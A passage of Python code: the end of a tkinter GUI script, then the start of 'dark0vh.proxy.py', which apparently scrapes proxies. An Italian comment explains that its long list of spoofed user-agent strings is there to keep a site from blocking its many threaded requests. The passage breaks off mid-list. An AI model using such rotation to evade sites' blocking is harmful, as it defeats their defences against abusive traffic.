print("run end")
def close_window():
print("destroy")
if surface.thread_run :
surface.thread_run = False
surface.thread.join(2.0)
win.destroy()
if __name__ == '__main__':
win = tk.Tk()
surface = Surface(win)
win.protocol('WM_DELETE_WINDOW', close_window)
win.mainloop()
|
dark0vh.proxy.py
|
import urllib.request
import re
import random
from bs4 import BeautifulSoup
import threading
# dichiarazione della lista degli useragents per evitare che il sito ci blocchi per le numerose richieste
useragents=["AdsBot-Google ( http://www.google.com/adsbot.html)",
"Avant Browser/1.2.789rel1 (http://www.avantbrowser.com)",
"Baiduspider ( http://www.baidu.com/search/spider.htm)",
"BlackBerry7100i/4.1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/103",
"BlackBerry7520/4.0.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/5.0.3.3 UP.Link/5.1.2.12 (Google WAP Proxy/1.0)",
"BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0",
"BlackBerry8320/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/100",
"BlackBerry8330/4.3.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/105",
"BlackBerry9000/4.6.0.167 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/102",
"BlackBerry9530/4.7.0.167 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/102 UP.Link/6.3.1.20.0",
"BlackBerry9700/5.0.0.351 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/123",
"Bloglines/3.1 (http://www.bloglines.com)",
"CSSCheck/1.2.2",
"Dillo/2.0",
"DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; http://www.google.com/bot.html)",
"DoCoMo/2.0 SH901iC(c100;TB;W24H12)",
"Download Demon/3.5.0.11",
"ELinks/0.12~pre5-4",
"ELinks (0.4pre5; Linux 2.6.10-ac7 i686; 80x33)",
"ELinks/0.9.3 (textmode; Linux 2.6.9-kanotix-8 i686; 127x41)",
"EmailWolf 1.00",
"everyfeed-spider/2.0 (http://www.everyfeed.com)",
"facebookscraper/1.0( http://www.facebook.com/sharescraper_help.php)",
"FAST-WebCrawler/3.8 (crawler at trd dot overture dot com; http://www.alltheweb.com/help/webmaster/crawler)",
"FeedFetcher-Google; ( http://www.google.com/feedfetcher.html)",
"Gaisbot/3.0 (robot@gais.cs.ccu.edu.tw; http://gais.cs.ccu.edu.tw/robot.php)",
"Googlebot/2.1 ( http://www.googlebot.com/bot.html)",
"Googlebot-Image/1.0",
"Googlebot-News",
"Googlebot-Video/1.0",
"Gregarius/0.5.2 ( http://devlog.gregarius.net/docs/ua)",
"grub-client-1.5.3; (grub-client-1.5.3; Crawl your own stuff with http://grub.org)",
"Gulper Web Bot 0.2.4 (www.ecsl.cs.sunysb.edu/~maxim/cgi-bin/Link/GulperBot)",
"HTC_Dream Mozilla/5.0 (Linux; U; Android 1.5; en-ca; Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"HTC-ST7377/1.59.502.3 (67150) Opera/9.50 (Windows NT 5.1; U; en) UP.Link/6.3.1.17.0",
"HTMLParser/1.6",
"iTunes/4.2 (Macintosh; U; PPC Mac OS X 10.2)",
"iTunes/9.0.2 (Windows; N)",
"iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)",
"Java/1.6.0_13",
"Jigsaw/2.2.5 W3C_CSS_Validator_JFouffa/2.0",
"Konqueror/3.0-rc4; (Konqueror/3.0-rc4; i686 Linux;;datecode)",
"LG-GC900/V10a Obigo/WAP2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1",
"LG-LX550 AU-MIC-LX550/2.0 MMP/2.0 Profile/MIDP-2.0 Configuration/CLDC-1.1",
"libwww-perl/5.820",
"Links/0.9.1 (Linux 2.4.24; i386;)",
"Links (2.1pre15; FreeBSD 5.3-RELEASE i386; 196x84)",
"Links (2.1pre15; Linux 2.4.26 i686; 158x61)",
"Links (2.3pre1; Linux 2.6.38-8-generic x86_64; 170x48)",
"Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12",
"Lynx/2.8.7dev.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8d",
"Mediapartners-Google",
"Microsoft URL Control - 6.00.8862",
"Midori/0.1.10 (X11; Linux i686; U; en-us) WebKit/(531).(2) ",
"MOT-L7v/08.B7.5DR MIB/2.2.1 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0",
"MOTORIZR-Z8/46.00.00 Mozilla/4.0 (compatible; MSIE 6.0; Symbian OS; 356) Opera 8.65 [it] UP.Link/6.3.0.0.0",
"MOT-V177/0.1.75 UP.Browser/6.2.3.9.c.12 (GUI) MMP/2.0 UP.Link/6.3.1.13.0",
"MOT-V9mm/00.62 UP.Browser/6.2.3.4.c.1.123 (GUI) MMP/2.0",
"Mozilla/1.22 (compatible; MSIE 5.01; PalmOS 3.0) EudoraWeb 2.1",
"Mozilla/2.02E (Win95; U)",
"Mozilla/2.0 (compatible; Ask Jeeves/Teoma)",
"Mozilla/3.01Gold (Win95; I)",
"Mozilla/3.0 (compatible; NetPositive/2.1.1; BeOS)",
"Mozilla/4.0 (compatible; GoogleToolbar 4.0.1019.5266-big; Windows XP 5.1; MSIE 6.0.2900.2180)",
"Mozilla/4.0 (compatible; Linux 2.6.22) NetFront/3.4 Kindle/2.0 (screen 600x800)",
"Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; MDA Pro/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1)",
"Mozilla/4.0 (compatible; MSIE 5.0; Series80/2.0 Nokia9500/4.51 Profile/MIDP-2.0 Configuration/CLDC-1.1)",
"Mozilla/4.0 (compatible; MSIE 5.15; Mac_PowerPC)",
"Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)",
"Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0 )",
"Mozilla/4.0 (compatible; MSIE 6.0; j2me) ReqwirelessWeb/3.5",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; PalmSource/hspr-H102; Blazer/4.0) 16;320x320",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.12; Microsoft ZuneHD 4.3)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.0",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser; Avant Browser; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; winfx; .NET CLR 1.1.4322; .NET CLR 2.0.50727; Zune 2.0) ",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows Phone OS 7.0; Trident/3.1; IEMobile/7.0) Asus;Galaxy6",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)",
"Mozilla/4.0 (PDA; PalmOS/sony/model prmr/Revision:1.1.54 (en)) NetFront/3.0",
"Mozilla/4.0 (PSP (PlayStation Portable); 2.00)",
"Mozilla/4.1 (compatible; MSIE 5.0; Symbian OS; Nokia 6600;452) Opera 6.20 [en-US]",
"Mozilla/4.77 [en] (X11; I; IRIX;64 6.5 IP30)",
"Mozilla/4.8 [en] (Windows NT 5.1; U)",
"Mozilla/4.8 [en] (X11; U; SunOS; 5.7 sun4u)",
"Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1",
"Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1",
"Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20060702 SeaMonkey/1.5a",
"Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en) AppleWebKit/534.1 (KHTML, Like Gecko) Version/6.0.0.141 Mobile Safari/534.1",
"Mozilla/5.0 (compatible; bingbot/2.0 http://www.bing.com/bingbot.htm)",
"Mozilla/5.0 (compatible; Exabot/3.0; http://www.exabot.com/go/robot) ",
"Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html)",
"Mozilla/5.0 (compatible; Konqueror/3.3; Linux 2.6.8-gentoo-r3; X11;",
"Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.30-7.dmz.1-liquorix-686; X11) KHTML/3.5.10 (like Gecko) (Debian package 4:3.5.10.dfsg.1-1 b1)",
"Mozilla/5.0 (compatible; Konqueror/3.5; Linux; en_US) KHTML/3.5.6 (like Gecko) (Kubuntu)",
"Mozilla/5.0 (compatible; Konqueror/3.5; NetBSD 4.0_RC3; X11) KHTML/3.5.7 (like Gecko)",
"Mozilla/5.0 (compatible; Konqueror/3.5; SunOS) KHTML/3.5.1 (like Gecko)",
"Mozilla/5.0 (compatible; Konqueror/4.1; DragonFly) KHTML/4.1.4 (like Gecko)",
"Mozilla/5.0 (compatible; Konqueror/4.1; OpenBSD) KHTML/4.1.4 (like Gecko)",
"Mozilla/5.0 (compatible; Konqueror/4.2; Linux) KHTML/4.2.4 (like Gecko) Slackware/13.0",
"Mozilla/5.0 (compatible; Konqueror/4.3; Linux) KHTML/4.3.1 (like Gecko) Fedora/4.3.1-3.fc11",
"Mozilla/5.0 (compatible; Konqueror/4.4; Linux 2.6.32-22-generic; X11; en_US) KHTML/4.4.3 (like Gecko) Kubuntu",
"Mozilla/5.0 (compatible; Konqueror/4.4; Linux) KHTML/4.4.1 (like Gecko) Fedora/4.4.1-1.fc12",
"Mozilla/5.0 (compatible; Konqueror/4.5; FreeBSD) KHTML/4.5.4 (like Gecko)",
"Mozilla/5.0 (compatible; Konqueror/4.5; NetBSD 5.0.2; X11; amd64; en_US) KHTML/4.5.4 (like Gecko)",
"Mozilla/5.0 (compatible; Konqueror/4.5; Windows) KHTML/4.5.4 (like Gecko)",
"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)",
"Mozilla/5.0 (compatible; MSIE 10.6; Windows NT 6.1; Trident/5.0; InfoPath.2; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727) 3gpp-gba UNTRUSTED/1.0",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Trident/5.0)",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; WOW64; Trident/5.0)",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0)",
"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)",
"Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)",
"Mozilla/5.0 (en-us) AppleWebKit/525.13 (KHTML, like Gecko; Google Web Preview) Version/3.1 Safari/525.13",
"Mozilla/5.0 (hp-tablet; Linux; hpwOS/3.0.2; U; de-DE) AppleWebKit/534.6 (KHTML, like Gecko) wOSBrowser/234.40.1 Safari/534.6 TouchPad/1.0",
"Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10",
"Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; ja-jp) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5",
"Mozilla/5.0 (iPad; U; CPU OS 4_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8F190 Safari/6533.18.5",
"Mozilla/5.0 (iPhone; U; CPU iPhone OS 2_0 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Mobile/5A347 Safari/525.200",
"Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16",
"Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_0 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8A293 Safari/531.22.7",
"Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_2_1 like Mac OS X; da-dk) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5",
"Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_3 like Mac OS X; de-de) AppleWebKit/533.17.9 (KHTML, like Gecko) Mobile/8F190",
"Mozilla/5.0 (iPhone; U; CPU iPhone OS) (compatible; Googlebot-Mobile/2.1; http://www.google.com/bot.html)",
"Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420 (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3",
"Mozilla/5.0 (iPod; U; CPU iPhone OS 2_2_1 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Mobile/5H11a Safari/525.20",
"Mozilla/5.0 (iPod; U; CPU iPhone OS 3_1_1 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Mobile/7C145",
"Mozilla/5.0 (Linux; U; Android 0.5; en-us) AppleWebKit/522 (KHTML, like Gecko) Safari/419.3",
"Mozilla/5.0 (Linux; U; Android 1.0; en-us; dream) AppleWebKit/525.10 (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2",
"Mozilla/5.0 (Linux; U; Android 1.1; en-gb; dream) AppleWebKit/525.10 (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2",
"Mozilla/5.0 (Linux; U; Android 1.5; de-ch; HTC Hero Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.5; de-de; Galaxy Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.5; de-de; HTC Magic Build/PLAT-RC33) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 FirePHP/0.3",
"Mozilla/5.0 (Linux; U; Android 1.5; en-gb; T-Mobile_G2_Touch Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.5; en-us; htc_bahamas Build/CRB17) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.5; en-us; sdk Build/CUPCAKE) AppleWebkit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.5; en-us; SPH-M900 Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.5; en-us; T-Mobile G1 Build/CRB43) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari 525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.5; fr-fr; GT-I5700 Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.6; en-us; HTC_TATTOO_A3288 Build/DRC79) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.6; en-us; SonyEricssonX10i Build/R1AA056) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 1.6; es-es; SonyEricssonX10i Build/R1FA016) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1",
"Mozilla/5.0 (Linux; U; Android 2.0.1; de-de; Milestone Build/SHOLS_U2_01.14.0) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17",
"Mozilla/5.0 (Linux; U; Android 2.0; en-us; Droid Build/ESD20) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17",
"Mozilla/5.0 (Linux; U; Android 2.0; en-us; Milestone Build/ SHOLS_U2_01.03.1) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17",
"Mozilla/5.0 (Linux; U; Android 2.1; en-us; HTC Legend Build/cupcake) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17",
"Mozilla/5.0 (Linux; U; Android 2.1; en-us; Nexus One Build/ERD62) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17",
"Mozilla/5.0 (Linux; U; Android 2.1-update1; de-de; HTC Desire 1.19.161.5 Build/ERE27) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17",
"Mozilla/5.0 (Linux; U; Android 2.2; en-ca; GT-P1000M Build/FROYO) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
"Mozilla/5.0 (Linux; U; Android 2.2; en-us; ADR6300 Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
"Mozilla/5.0 (Linux; U; Android 2.2; en-us; Droid Build/FRG22D) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
"Mozilla/5.0 (Linux; U; Android 2.2; en-us; Nexus One Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
"Mozilla/5.0 (Linux; U; Android 2.2; en-us; Sprint APA9292KT Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
"Mozilla/5.0 (Linux; U; Android 2.3.4; en-us; BNTV250 Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Safari/533.1",
"Mozilla/5.0 (Linux; U; Android 3.0.1; en-us; GT-P7100 Build/HRI83) AppleWebkit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13",
"Mozilla/5.0 (Linux; U; Android 3.0.1; fr-fr; A500 Build/HRI66) AppleWebKit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13",
"Mozilla/5.0 (Linux; U; Android 3.0; en-us; Xoom Build/HRI39) AppleWebKit/525.10 (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2",
"Mozilla/5.0 (Linux; U; Android 4.0.3; de-ch; HTC Sensation Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30",
"Mozilla/5.0 (Linux; U; Android 4.0.3; de-de; Galaxy S II Build/GRJ22) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30",
"Mozilla/5.0 (Linux U; en-US) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) Version/4.0 Kindle/3.0 (screen 600x800; rotate)",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.5; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.54 Safari/535.2",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Camino/2.2.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre Camino/2.2a1pre",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:9.0) Gecko/20100101 Firefox/9.0",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1063.0 Safari/536.3",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-US) AppleWebKit/528.16 (KHTML, like Gecko, Safari/528.16) OmniWeb/v622.8.0",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7;en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.302.2 Safari/532.8",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.464.0 Safari/534.3",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; de-de) AppleWebKit/534.15 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.15 Safari/534.13",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-us) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.14) Gecko/20110218 AlexaToolbar/alxf-2.0 Firefox/3.6.14",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7; en-us) AppleWebKit/534.20.8 (KHTML, like Gecko) Version/5.1 Safari/534.20.8",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US) AppleWebKit/528.16 (KHTML, like Gecko, Safari/528.16) OmniWeb/v622.8.0.112941",
"Mozilla/5.0 (Macintosh; U; Mac OS X Mach-O; en-US; rv:2.0a) Gecko/20040614 Firefox/3.0.0 ",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.5; en-US; rv:1.9.0.3) Gecko/2008092414 Firefox/3.0.3",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.5; en-US; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.2 (KHTML, like Gecko) Safari/125.8",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.2 (KHTML, like Gecko) Safari/85.8",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/418.8 (KHTML, like Gecko) Safari/419.3",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.15",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/312.5 (KHTML, like Gecko) Safari/312.3",
"Mozilla/5.0 (Maemo; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1",
"Mozilla/5.0 (Maemo; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1",
"Mozilla/5.0 (MeeGo; NokiaN950-00/00) AppleWebKit/534.13 (KHTML, like Gecko) NokiaBrowser/8.5.0 Mobile Safari/534.13",
"Mozilla/5.0 (MeeGo; NokiaN9) AppleWebKit/534.13 (KHTML, like Gecko) NokiaBrowser/8.5.0 Mobile Safari/534.13",
"Mozilla/5.0 (PLAYSTATION 3; 1.10)",
"Mozilla/5.0 (PLAYSTATION 3; 2.00)",
"Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41",
"Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaC6-01/011.010; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.7.2 3gpp-gba",
"Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaC7-00/012.003; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.7.3 3gpp-gba",
"Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaE6-00/021.002; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.16 Mobile Safari/533.4 3gpp-gba",
"Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaE7-00/010.016; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.7.3 3gpp-gba",
"Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaN8-00/014.002; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.6.4 3gpp-gba",
"Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaX7-00/021.004; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.21 Mobile Safari/533.4 3gpp-gba",
"Mozilla/5.0 (SymbianOS/9.1; U; de) AppleWebKit/413 (KHTML, like Gecko) Safari/413",
"Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413",
"Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es50",
"Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es65",
"Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es70",
"Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 Nokia5700/3.27; Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML, like Gecko) Safari/413",
"Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 Nokia6120c/3.70; Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML, like Gecko) Safari/413",
"Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaE90-1/07.24.0.3; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413 UP.Link/6.2.3.18.0",
"Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95/10.0.018; Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML, like Gecko) Safari/413 UP.Link/6.3.0.0.0",
"Mozilla/5.0 (SymbianOS 9.4; Series60/5.0 NokiaN97-1/10.0.012; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) WicKed/7.1.12344",
"Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 NokiaN97-1/10.0.012; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) WicKed/7.1.12344",
"Mozilla/5.0 (SymbianOS/9.4; U; Series60/5.0 SonyEricssonP100/01; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 Safari/525",
"Mozilla/5.0 (Unknown; U; UNIX BSD/SYSV system; C -) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.2",
"Mozilla/5.0 (webOS/1.3; U; en-US) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/1.0 Safari/525.27.1 Desktop/1.0",
"Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0",
